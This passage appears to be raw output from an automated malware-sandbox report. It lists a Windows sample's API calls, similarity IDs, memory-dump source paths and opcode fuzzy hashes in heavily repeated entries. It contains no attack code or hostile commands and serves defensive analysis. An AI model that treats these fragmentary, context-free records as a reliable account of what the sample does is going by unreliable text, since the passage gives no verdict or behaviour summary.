                                            • Part of subcall function 00F8A69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00F8A592,000000FF,?,?), ref: 00F8A6FE
                                          • FindClose.KERNEL32(00000000,000000FF,?,?), ref: 00F8A598
                                          Similarity
                                          • API ID: Find$FileFirst$CloseErrorLast
                                          • String ID:
                                          • API String ID: 1464966427-0
                                          APIs
                                          • SetThreadExecutionState.KERNEL32(00000001), ref: 00F90E3D
                                          Similarity
                                          • API ID: ExecutionStateThread
                                          • String ID:
                                          • API String ID: 2211380416-0
                                          APIs
                                          • GdipAlloc.GDIPLUS(00000010), ref: 00F9A62C
                                            • Part of subcall function 00F9A3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00F9A3DA
                                          Similarity
                                          • API ID: Gdip$AllocBitmapCreateFromStream
                                          • String ID:
                                          • API String ID: 1915507550-0
                                          APIs
                                          • DloadProtectSection.DELAYIMP ref: 00F9E5E3
                                          Similarity
                                          • API ID: DloadProtectSection
                                          • String ID:
                                          • API String ID: 2203082970-0
                                          APIs
                                          • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00F91B3E), ref: 00F9DD92
                                            • Part of subcall function 00F9B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00F9B579
                                            • Part of subcall function 00F9B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00F9B58A
                                            • Part of subcall function 00F9B568: IsDialogMessageW.USER32(0001040C,?), ref: 00F9B59E
                                            • Part of subcall function 00F9B568: TranslateMessage.USER32(?), ref: 00F9B5AC
                                            • Part of subcall function 00F9B568: DispatchMessageW.USER32(?), ref: 00F9B5B6
                                          Similarity
                                          • API ID: Message$DialogDispatchItemPeekSendTranslate
                                          • String ID:
                                          • API String ID: 897784432-0
                                          APIs
                                          • GetFileType.KERNEL32(000000FF,00F897BE), ref: 00F898C8
                                          Similarity
                                          • API ID: FileType
                                          • String ID:
                                          • API String ID: 3081899298-0
                                          APIs
                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F9E1E3
                                            • Part of subcall function 00F9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F9E8D0
                                            • Part of subcall function 00F9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F9E8E1
                                          Similarity
                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                          • String ID:
                                          • API String ID: 1269201914-0
                                          APIs
                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F9E1E3
                                            • Part of subcall function 00F9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F9E8D0
                                            • Part of subcall function 00F9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F9E8E1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          Similarity
                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                          • String ID:
                                          • API String ID: 1269201914-0
                                          APIs
                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F9EAF9
                                            • Part of subcall function 00F9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F9E8D0
                                            • Part of subcall function 00F9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F9E8E1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                          • String ID:
                                          • API String ID: 1269201914-0
                                          • Opcode ID: bac0e1833c86a6f877fcaa7d40e7417ee4699e7fded25889ed607045fc361d74
                                          • Instruction ID: 0f7d975e466792bfe96c9588a40c7588230b3bb2b5f66e3f14f03ad0988cbb38
                                          • Opcode Fuzzy Hash: bac0e1833c86a6f877fcaa7d40e7417ee4699e7fded25889ed607045fc361d74
                                          • Instruction Fuzzy Hash: A4B012C72AA0827C3904E2431D0AD77030DC0D0BA0330842EF604C4492EC854C013872
                                          APIs
                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F9E1E3
                                            • Part of subcall function 00F9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F9E8D0
                                            • Part of subcall function 00F9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F9E8E1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                          • String ID:
                                          • API String ID: 1269201914-0
                                          • Opcode ID: fa127c5ff864da55951efb19a36d660be321fae6409ab8211dc05bb2276e8b4a
                                          • Instruction ID: e39eae94441792d0621048677eac1443dbcb432d8ac4c1b261c6a5a66b4e4a1a
                                          • Opcode Fuzzy Hash: fa127c5ff864da55951efb19a36d660be321fae6409ab8211dc05bb2276e8b4a
                                          • Instruction Fuzzy Hash: FBB012E2268041EC3504D1471E0AE37018CC2C0B10330403EF805C5081DC45ADC53872
                                          APIs
                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F9E1E3
                                            • Part of subcall function 00F9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F9E8D0
                                            • Part of subcall function 00F9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F9E8E1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                          • String ID:
                                          • API String ID: 1269201914-0
                                          • Opcode ID: c6270ed1bd01bbc8bcb5c2c45afaada81d129853f6dd915b9e8b1ceeb4565220
                                          • Instruction ID: 321b04a7fcc96b06e67dddbc0276cd32ddbba779754c16f3537115bee34cbbf8
                                          • Opcode Fuzzy Hash: c6270ed1bd01bbc8bcb5c2c45afaada81d129853f6dd915b9e8b1ceeb4565220
                                          • Instruction Fuzzy Hash: C1B012D2268041AC3504D1571D0AE37014CC2C1B10330803EFC05C5081DC44ECC43872
                                          APIs
                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F9E1E3
                                            • Part of subcall function 00F9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F9E8D0
                                            • Part of subcall function 00F9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F9E8E1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                          • String ID:
                                          • API String ID: 1269201914-0
                                          • Opcode ID: 1e7b15d6bed36aabe0f07690542f64eb192fa6d3bc6d3633fb92eeaa7deceadc
                                          • Instruction ID: cf04a9ce8237d933bad5615259855340d591c9f445d496141e70dcbf60e8dec9
                                          • Opcode Fuzzy Hash: 1e7b15d6bed36aabe0f07690542f64eb192fa6d3bc6d3633fb92eeaa7deceadc
                                          • Instruction Fuzzy Hash: FAB012D2279081AC3504D1471D0AE37014DC6C0B10330407EF806C5081DC54ACC43872
                                          APIs
                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F9E1E3
                                            • Part of subcall function 00F9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F9E8D0
                                            • Part of subcall function 00F9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F9E8E1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                          • String ID:
                                          • API String ID: 1269201914-0
                                          • Opcode ID: ff2d7959a85134721dd636c2d4cb63d4f7aad701a8893485ecf6df6530636889
                                          • Instruction ID: 944b67cf3940ddb1c23b76eeb33b380fc61789d49570b8f89e4cbba80fb76ea9
                                          • Opcode Fuzzy Hash: ff2d7959a85134721dd636c2d4cb63d4f7aad701a8893485ecf6df6530636889
                                          • Instruction Fuzzy Hash: 18B012E2269181BC3544D2471D0AE3B010DC2C0B10330413EF805C5081DC54ACC83872
                                          APIs
                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F9E1E3
                                            • Part of subcall function 00F9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F9E8D0
                                            • Part of subcall function 00F9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F9E8E1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                          • String ID:
                                          • API String ID: 1269201914-0
                                          • Opcode ID: fb1a69eb7b05946c055f0d8c81c907ac0c7e1a74022b4cdc60623159f182e9a7
                                          • Instruction ID: 38cec861043639e68784142c4653f5a0283f80368368f4179c445de436b9125a
                                          • Opcode Fuzzy Hash: fb1a69eb7b05946c055f0d8c81c907ac0c7e1a74022b4cdc60623159f182e9a7
                                          • Instruction Fuzzy Hash: C4B012D2269081AC3504D1471D0AE37010DC2C1B10330803EFC05C5081DC54ECC43872
                                          APIs
                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F9E1E3
                                            • Part of subcall function 00F9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F9E8D0
                                            • Part of subcall function 00F9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F9E8E1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                          • String ID:
                                          • API String ID: 1269201914-0
                                          • Opcode ID: db983930fd7e1dd018977d00a7cd71c74dbdb8a0c7652d9a9f5cb1a2d108306a
                                          • Instruction ID: 8a5554c9b98c3fb4e6e9e4321f500d9384daf4543c41bea83d139a5f65a395b6
                                          • Opcode Fuzzy Hash: db983930fd7e1dd018977d00a7cd71c74dbdb8a0c7652d9a9f5cb1a2d108306a
                                          • Instruction Fuzzy Hash: 54B012F2268041AC3504D1471D0AE37010CC2C0F10330407EF805C5081DC44ADC43872
                                          APIs
                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F9E1E3
                                            • Part of subcall function 00F9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F9E8D0
                                            • Part of subcall function 00F9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F9E8E1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                          • String ID:
                                          • API String ID: 1269201914-0
                                          • Opcode ID: abfed1c844e0416c077a3a26e1e16c1c31f8faa383b2c45b037e5c8987693b5d
                                          • Instruction ID: e8fc537b7374c29066a2fb14bf5d8cbde55ae06bcd6b175456bffb4e7d271a3b
                                          • Opcode Fuzzy Hash: abfed1c844e0416c077a3a26e1e16c1c31f8faa383b2c45b037e5c8987693b5d
                                          • Instruction Fuzzy Hash: AFB012F2268041AC3504D1471E0AE37010DC2C0F10330403EF805C5081DC45AEC53872
                                          APIs
                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F9E1E3
                                            • Part of subcall function 00F9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F9E8D0
                                            • Part of subcall function 00F9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F9E8E1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                          • String ID:
                                          • API String ID: 1269201914-0
                                          • Opcode ID: 2b4870a12b52bfa8cf81d4c73da3b863ad74f6db24cde624e88ac5695f5887ab
                                          • Instruction ID: e103ab30103f1dc2e228f13b9888eb5ff158682a6a5149c1de87bf99857148c8
                                          • Opcode Fuzzy Hash: 2b4870a12b52bfa8cf81d4c73da3b863ad74f6db24cde624e88ac5695f5887ab
                                          • Instruction Fuzzy Hash: A4B012F2268141BC3544D1471D0AE37010CC2C0F10330413EF805C5081DC45ADC43872
                                          APIs
                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F9E1E3
                                            • Part of subcall function 00F9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F9E8D0
                                            • Part of subcall function 00F9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F9E8E1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                          • String ID:
                                          • API String ID: 1269201914-0
                                          • Opcode ID: 5dcc3c0e2555448f7d5abf267326cd34a83da10c4374cb4126205b7d182d7004
                                          • Instruction ID: 1164001d02964e776b3a354ed87da2da189f7c17c51aa39f90eb7ff1f2234590
                                          • Opcode Fuzzy Hash: 5dcc3c0e2555448f7d5abf267326cd34a83da10c4374cb4126205b7d182d7004
                                          • Instruction Fuzzy Hash: A9B012F2268041BC3504D1471D0AE37010CC2C1F10330803EFC05C5081DC44EDC43872
                                          APIs
                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F9E1E3
                                            • Part of subcall function 00F9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F9E8D0
                                            • Part of subcall function 00F9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F9E8E1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                          • String ID:
                                          • API String ID: 1269201914-0
                                          • Opcode ID: 43d210c44ecc3c97696f59de5ea29bf3e07412bb21d072e4d08322692ef0de1f
                                          • Instruction ID: dbb83f2a3c2a591f2e32960190f6b8eda41b68dfb1d9593fa54ace943b760655
                                          • Opcode Fuzzy Hash: 43d210c44ecc3c97696f59de5ea29bf3e07412bb21d072e4d08322692ef0de1f
                                          • Instruction Fuzzy Hash: 8FB012D2268041BC3504D2471E0AE37010CC2C0B10330803EF805C5181DC55ADCD3872
                                          APIs
                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F9E1E3
                                            • Part of subcall function 00F9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F9E8D0
                                            • Part of subcall function 00F9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F9E8E1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                          • String ID:
                                          • API String ID: 1269201914-0
                                          • Opcode ID: 9f181434d330fc0015b0ba8d5c05e77026f7973890aaaad5cdf6944d5deb14bb
                                          • Instruction ID: 051be65a1aa9495bfdd8f5aced4760f948d217359dc439526362a8d02ce642a3
                                          • Opcode Fuzzy Hash: 9f181434d330fc0015b0ba8d5c05e77026f7973890aaaad5cdf6944d5deb14bb
                                          • Instruction Fuzzy Hash: 6AB012D2368181BC3544D2472D0AE37010CC2C0B10330813EF805C5181DC44ACC83872
                                          APIs
                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F9E3FC
                                            • Part of subcall function 00F9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F9E8D0
                                            • Part of subcall function 00F9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F9E8E1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                          • String ID:
                                          • API String ID: 1269201914-0
                                          • Opcode ID: 595f7133b122e156a99756567ab6b522a816fa6263689b04b02a0d8ba83e2f6e
                                          • Instruction ID: 2c50648f43b11adcf9c708e4e783c01e3aea55f39d382e20cae084df5e8aa6e5
                                          • Opcode Fuzzy Hash: 595f7133b122e156a99756567ab6b522a816fa6263689b04b02a0d8ba83e2f6e
                                          • Instruction Fuzzy Hash: B3B012E2268040BC3544D1475C0AE77030DC0C0B10330C42FF908C20C1EC408C043873
                                          APIs
                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F9E3FC
                                            • Part of subcall function 00F9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F9E8D0
                                            • Part of subcall function 00F9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F9E8E1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                          • String ID:
                                          • API String ID: 1269201914-0
                                          • Opcode ID: 5c4cfff8d0b90c4897e6fa30dedbc481e8b76b22e62d520933e7236dad4e06a1
                                          • Instruction ID: a146cf11819f5ddc25dda3e1344c7b20237d6b3df10938d4521f151449db6680
                                          • Opcode Fuzzy Hash: 5c4cfff8d0b90c4897e6fa30dedbc481e8b76b22e62d520933e7236dad4e06a1
                                          • Instruction Fuzzy Hash: BDB012F2268040BC3544D1475C0AE77030DC0C0F10331842FF808C2081EC448E003873
                                          APIs
                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00F9E3FC
                                            • Part of subcall function 00F9E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F9E8D0
                                            • Part of subcall function 00F9E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F9E8E1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
